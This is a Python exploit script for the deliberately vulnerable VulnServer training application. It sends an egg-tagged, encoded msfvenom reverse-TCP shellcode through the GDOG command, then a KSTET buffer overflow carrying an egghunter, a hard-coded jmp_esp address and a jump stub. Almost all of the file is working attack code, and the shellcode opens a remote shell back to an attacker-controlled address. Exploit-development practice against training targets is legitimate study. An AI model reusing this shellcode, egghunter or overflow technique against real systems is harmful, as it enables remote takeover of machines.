#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/25 21:19:20 dhn Exp $

import socket
import argparse

class Exploit:
    """Deliver the two VulnServer requests built by ``main`` over one TCP socket.

    The first request (``GDOG``) carries ``shellcode``; the second (``KSTET``)
    carries ``payload``. Strings are written to the socket unchanged, so this
    class appears to be written for Python 2, where ``str`` is a byte string
    (``socket.send`` on Python 3 requires ``bytes``) -- confirm before use.
    """

    def __init__(self, server, port, payload, shellcode):
        # Stored verbatim; no validation of host, port or buffer contents.
        self._server = server
        self._port = port
        self._payload = payload
        self._shellcode = shellcode

    def __connect(self):
        """Return a freshly connected TCP socket to ``(server, port)``."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((self._server, self._port))
        return sock

    def run(self):
        """Send both requests in order.

        Returns 1 when any ``socket.error`` is raised, otherwise ``None``
        (callers treat a falsy result as success). The socket is closed
        only on the success path; after an error it is left to the
        garbage collector.
        """
        try:
            sock = self.__connect()
            print("[+] Sending payload...")
            sock.send("GDOG " + self._shellcode + "\r\n")
            # One read of up to 1024 bytes before the second request;
            # the response is discarded.
            sock.recv(1024)
            sock.send("KSTET " + self._payload + "\r\n")
            sock.close()
        except socket.error:
            print("[!] Socket error...")
            return 1

def main(args):
    """Assemble the staged KSTET payload and hand it to ``Exploit``.

    ``args`` is expected to carry ``host`` and ``port`` (the argparse
    namespace built under ``__main__``). ``port`` is converted with
    ``int`` and raises ``ValueError`` if it is not numeric. Returns
    ``None``; the outcome is reported on stdout only, based on the
    return value of ``Exploit.run``.

    NOTE(review): the ``"\\x.."`` escapes above 0x7f and the str-based
    ``socket.send`` in ``Exploit`` look like Python 2 byte-string
    semantics -- confirm the interpreter before relying on the byte
    counts in the comments below.
    """
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.168.142.129 LPORT=443 \
    #        -f py -e x86/alpha_mixed -b '\x00' EXITFUNC=thread BufferRegister=EDI
    # "T00WT00W" is the egg tag prepended to the encoded shellcode; the
    # egghunter below scans memory for it.
    shellcode = ( "T00WT00W" +
        "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
        "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        "\x6b\x4c\x7a\x48\x4d\x52\x47\x70\x63\x30\x67\x70\x35"
        "\x30\x4e\x69\x6a\x45\x30\x31\x79\x50\x53\x54\x6e\x6b"
        "\x62\x70\x50\x30\x6e\x6b\x53\x62\x76\x6c\x6e\x6b\x76"
        "\x32\x55\x44\x4e\x6b\x61\x62\x46\x48\x76\x6f\x6c\x77"
        "\x53\x7a\x66\x46\x76\x51\x4b\x4f\x6e\x4c\x37\x4c\x35"
        "\x31\x31\x6c\x44\x42\x34\x6c\x51\x30\x69\x51\x58\x4f"
        "\x74\x4d\x57\x71\x49\x57\x48\x62\x59\x62\x61\x42\x76"
        "\x37\x6c\x4b\x76\x32\x54\x50\x6c\x4b\x42\x6a\x77\x4c"
        "\x4e\x6b\x72\x6c\x34\x51\x62\x58\x58\x63\x47\x38\x47"
        "\x71\x7a\x71\x70\x51\x4e\x6b\x43\x69\x35\x70\x46\x61"
        "\x48\x53\x4c\x4b\x71\x59\x64\x58\x6b\x53\x36\x5a\x47"
        "\x39\x4e\x6b\x65\x64\x4c\x4b\x76\x61\x6e\x36\x30\x31"
        "\x59\x6f\x6c\x6c\x49\x51\x4a\x6f\x66\x6d\x73\x31\x38"
        "\x47\x64\x78\x6b\x50\x71\x65\x38\x76\x74\x43\x61\x6d"
        "\x49\x68\x77\x4b\x61\x6d\x34\x64\x44\x35\x6a\x44\x70"
        "\x58\x6c\x4b\x51\x48\x46\x44\x55\x51\x5a\x73\x73\x56"
        "\x4e\x6b\x54\x4c\x32\x6b\x6c\x4b\x32\x78\x75\x4c\x53"
        "\x31\x6a\x73\x6c\x4b\x37\x74\x6e\x6b\x46\x61\x38\x50"
        "\x4d\x59\x43\x74\x64\x64\x61\x34\x71\x4b\x33\x6b\x33"
        "\x51\x33\x69\x30\x5a\x43\x61\x49\x6f\x69\x70\x31\x4f"
        "\x73\x6f\x50\x5a\x6c\x4b\x47\x62\x68\x6b\x6e\x6d\x63"
        "\x6d\x50\x68\x47\x43\x65\x62\x73\x30\x53\x30\x45\x38"
        "\x53\x47\x61\x63\x36\x52\x51\x4f\x51\x44\x70\x68\x72"
        "\x6c\x54\x37\x57\x56\x75\x57\x79\x6f\x49\x45\x6f\x48"
        "\x4c\x50\x66\x61\x57\x70\x37\x70\x66\x49\x4f\x34\x46"
        "\x34\x46\x30\x52\x48\x37\x59\x4d\x50\x52\x4b\x45\x50"
        "\x69\x6f\x5a\x75\x76\x30\x70\x50\x52\x70\x66\x30\x67"
        "\x30\x70\x50\x71\x50\x46\x30\x31\x78\x4a\x4a\x66\x6f"
        "\x39\x4f\x79\x70\x4b\x4f\x78\x55\x4c\x57\x32\x4a\x76"
        "\x65\x53\x58\x37\x7a\x4e\x48\x6c\x4e\x6e\x61\x33\x58"
        "\x77\x72\x35\x50\x35\x51\x4d\x6b\x4d\x59\x68\x66\x71"
        "\x7a\x32\x30\x53\x66\x73\x67\x45\x38\x4f\x69\x4e\x45"
        "\x72\x54\x55\x31\x6b\x4f\x4e\x35\x4e\x65\x79\x50\x34"
        "\x34\x66\x6c\x69\x6f\x72\x6e\x73\x38\x54\x35\x78\x6c"
        "\x43\x58\x5a\x50\x4f\x45\x6f\x52\x76\x36\x4b\x4f\x6b"
        "\x65\x45\x38\x50\x63\x42\x4d\x61\x74\x57\x70\x4f\x79"
        "\x68\x63\x61\x47\x51\x47\x62\x77\x46\x51\x38\x76\x52"
        "\x4a\x37\x62\x32\x79\x36\x36\x38\x62\x49\x6d\x62\x46"
        "\x7a\x67\x31\x54\x76\x44\x67\x4c\x57\x71\x65\x51\x4c"
        "\x4d\x32\x64\x37\x54\x52\x30\x6b\x76\x65\x50\x42\x64"
        "\x43\x64\x72\x70\x36\x36\x53\x66\x63\x66\x42\x66\x33"
        "\x66\x62\x6e\x43\x66\x61\x46\x46\x33\x56\x36\x70\x68"
        "\x62\x59\x78\x4c\x45\x6f\x6d\x56\x79\x6f\x58\x55\x4b"
        "\x39\x49\x70\x30\x4e\x56\x36\x71\x56\x59\x6f\x36\x50"
        "\x45\x38\x45\x58\x6c\x47\x35\x4d\x33\x50\x79\x6f\x48"
        "\x55\x4d\x6b\x6b\x50\x55\x4d\x45\x7a\x57\x7a\x73\x58"
        "\x4e\x46\x6a\x35\x6d\x6d\x6d\x4d\x49\x6f\x68\x55\x77"
        "\x4c\x54\x46\x61\x6c\x75\x5a\x6f\x70\x59\x6b\x4b\x50"
        "\x30\x75\x35\x55\x6f\x4b\x37\x37\x64\x53\x51\x62\x70"
        "\x6f\x42\x4a\x53\x30\x71\x43\x4b\x4f\x48\x55\x41\x41"
    )

    # stage 1: add 0x06 bytes to eax and jmp to it
    # ADD EAX, 0x06 ; 83 c0 06
    # JMP EAX       ; ff e0
    # Each fragment is padded with NOPs (0x90) to 4 bytes.
    add_eax = "\x90\x83\xc0\x06"
    jmp_eax = "\xff\xe0\x90\x90"
    # Hard-coded address in essfunc.dll (little-endian); only valid for the
    # specific VulnServer build this was written against.
    jmp_esp = "\xbb\x11\x50\x62" # in essfunc.dll

    # stage 2: 32 byte egghunter -> W00TW00T
    # NOTE(review): the tag prepended to the shellcode above is "T00WT00W",
    # which does not match the "W00TW00T" named here -- confirm which string
    # the hunter compares against.
    egghunter = (
        "\x66\x81\xca\xff\x0f\x42\x52\x6a"
        "\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
        "\xef\xb8\x54\x30\x30\x57\x8b\xfa"
        "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    )

    # payload: 92 bytes
    # Layout: 8 NOPs + 32-byte egghunter + 30 x 0xCC filler (70 bytes total)
    # + 4-byte jmp_esp + 10 NOPs + 4-byte add_eax + 4-byte jmp_eax = 92.
    payload = "\x90" * 8
    payload += egghunter + "\xcc" * (70 - 8 - len(egghunter))
    payload += jmp_esp
    payload +="\x90" * 10
    payload += add_eax + jmp_eax

    # fire and forget!
    # int() raises ValueError for a non-numeric --port; not caught here.
    exploit = Exploit(args.host, int(args.port), payload, shellcode)
    print("[+] VulnServer KSTET exploit by dhn")
    print("[+] Exploiting %s:%s" % (args.host, args.port))
    # run() returns 1 on socket.error and None otherwise.
    if exploit.run():
        print("[!] Fail")
    else:
        print("[+] Done")



if __name__ == "__main__":
    # Both flags are mandatory; argparse exits with a usage message if
    # either is missing. --port is kept as a string and converted in main().
    parser = argparse.ArgumentParser()
    for flag in ("--host", "--port"):
        parser.add_argument(flag, required=True)
    args = parser.parse_args()
    main(args)
